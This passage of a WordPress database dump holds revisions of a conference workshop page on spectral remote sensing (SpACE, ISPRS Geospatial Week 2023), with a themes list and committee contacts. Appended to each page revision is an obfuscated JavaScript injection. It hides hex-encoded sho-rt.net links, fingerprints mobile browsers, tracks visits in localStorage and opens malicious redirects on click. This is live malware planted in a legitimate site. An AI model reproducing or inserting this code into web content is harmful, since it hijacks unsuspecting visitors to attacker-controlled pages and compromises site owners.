_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-revision-v1','','','2023-02-06 22:48:51','2023-02-06 22:48:51','',3855,'https://gsw2023.com/?p=3858',0,'revision','',0),
(3859,1,'2023-02-06 22:51:05','2023-02-06 22:51:05','','ws28main2','','inherit','open','closed','','ws28main2','','','2023-02-06 22:51:05','2023-02-06 22:51:05','',3855,'https://gsw2023.com/wp-content/uploads/2023/02/ws28main2.jpg',0,'attachment','image/jpeg',0),
(3860,1,'2023-02-06 22:51:46','2023-02-06 22:51:46','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong>','','inherit','closed','closed','','3855-revision-v1','','','2023-02-06 22:51:46','2023-02-06 22:51:46','',3855,'https://gsw2023.com/?p=3860',0,'revision','',0),
(3861,1,'2023-02-06 23:03:31','2023-02-06 23:03:31','','ws28main3','','inherit','open','closed','','ws28main3','','','2023-02-06 23:03:31','2023-02-06 23:03:31','',3855,'https://gsw2023.com/wp-content/uploads/2023/02/ws28main3.jpg',0,'attachment','image/jpeg',0),
(3862,1,'2023-02-06 23:04:04','2023-02-06 23:04:04','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3859\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>SpACE - Spectral Remote Sensing in the era of AI, Cloud and Edge Computing</strong></span></h5>\n<p>&nbsp;</p>\n<p><strong>Spectral remote sensing including hyperspectral, multispectral, thermal sensors onboard satellites, aerial, terrestrial and marine acquisition systems, as well as spectral data analytics is an active research topic in Remote Sensing and Computer Vision. This workshop will bring together experts working in cutting-edge spectral remote sensing systems to discuss recent developments in instrumentation, advanced analytics including artificial intelligence, cloud and edge computing methodologies, and future trends in automated information extraction from spectral data. Its fcus is on methodological research. SpACE will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></p>\n<p><u> </u>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>CHAIRS</strong></span></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Spaceborne, airborne, terrestrial, marine and mobile multispectral and hyperspectral sensors and data processing</li>\n<li>Thermal remote sensing</li>\n<li>Radiometric, atmospheric and geometric calibration/corrections of spectral and thermal data.</li>\n<li>Spectral unmixing, denoising, dimensionality reduction and compression of hyperspectral and multispectral data</li>\n<li>Processing and analysis of 1D signals, 2D images, 3D hyperspectral cubes and 4D spectral video datasets</li>\n<li>Fusion and harmonization of spectral/thermal data with other modalities (e.g., Lidar, SAR, Acoustic), a priori information, geospatial and multitemporal data</li>\n<li>AI methods for spectral data analysis and understanding</li>\n<li>Deep learning and explainability for spectral data analysis</li>\n<li>Cloud-based frameworks for spectral data analytics</li>\n<li>Edge-computing methods for efficient spectral data processing</li>\n<li>Analysis and applications based on multi-temporal and multi-sensor data</li>\n<li>Evaluation benchmarks for assessing method performance, robustness, explainability, scalability and generalization</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee </strong></h5>\n<ul>\n<li>Konstantinos Karantzalos (<a href=\"mailto:karank@central.ntua.gr\">karank@central.ntua.gr</a>), WG III/2 Chair</li>\n<li>Daniele Cerra (<a href=\"mailto:Daniele.Cerra@dlr.de\">Cerra@dlr.de</a>), WG I/3 Chair</li>\n<li>Xinlian Liang (<a href=\"mailto:xinlian.liang@whu.edu.cn\">liang@whu.edu.cn</a>), WG II/1 Chair</li>\n<li>Anna Brook (Israel) (<a href=\"mailto:abrook@geo.haifa.ac.il\">abrook@geo.haifa.ac.il</a>), WG III/2</li>\n<li>Jean-Louis Roujean (<a href=\"mailto:jean-louis.roujean@univ-tlse3.fr\">jean-louis.roujean@univ-tlse3.fr</a>) , WG III/2</li>\n<li>Ilkka Pölönen (<a href=\"mailto:ilkka.polonen@jyu.fi\">polonen@jyu.fi</a>) , WG III/2</li>\n<li>Mi Wang (<a href=\"mailto:wangmi@whu.edu.cn\">wangmi@whu.edu.cn</a>), WG I/3</li>\n<li>Jose Marcato Junior (<a href=\"mailto:jose.marcato@ufms.br\">marcato@ufms.br</a>), WG I/3</li>\n<li>Maria Teresa Melis  (<a href=\"mailto:titimelis@unica.it\">titimelis@unica.it</a>), WG II/1</li>\n<li>Weishu Gong (<a href=\"mailto:wsgong@umd.edu\">wsgong@umd.edu</a>), WG II/1</li>\n<li>Martin Mokroš (<a href=\"mailto:mokros@fld.czu.cz\">mokros@fld.czu.cz</a>), WG II/1</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG III/2 Spectral and Thermal Data Processing and Analytics</li>\n<li>WG I/3 Multispectral, Hyperspectral and Thermal Sensors</li>\n<li>WG III/1 Remote Sensing Data Processing and Understanding</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Special Issue dedicated to the workshop:</strong></h5>\n<p>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to an International Journal (tba). The papers being accepted after the peer-review process of the journal will appear in a Special Issue of that journal dedicated to this workshop.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3861\" img_size=\"1200x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 